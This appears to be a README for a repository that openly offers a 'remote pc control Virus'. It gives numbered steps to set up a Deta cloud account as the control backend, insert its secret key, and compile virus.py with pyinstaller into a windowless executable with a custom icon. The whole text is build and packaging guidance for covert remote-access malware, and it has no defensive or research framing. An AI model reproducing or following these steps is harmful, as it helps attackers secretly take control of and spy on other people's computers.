A simple remote pc control Virus
1.Create a Deta account
2.Open virusFunctions.py and paste <YOUR-DETA-SECRET_KEY>
3.Open Command prompt and run pip install -r requirements.txt
4.CD to the cloned repository folder and run
pyinstaller --onefile --noconsole --icon=app.ico --add-binary "C:<YOUR-PATH>AppData\Local\Programs\Python\Python38\Lib\site-packages\cv2\opencv_videoio_ffmpeg454_64.dll;." virus.py --path="C:<YOUR-PATH\AppData\Local\Programs\Python\Python38\Lib\site-packages\cv2"
5.After compilation open dist folder you'll find virus.exe--> your compiled virus file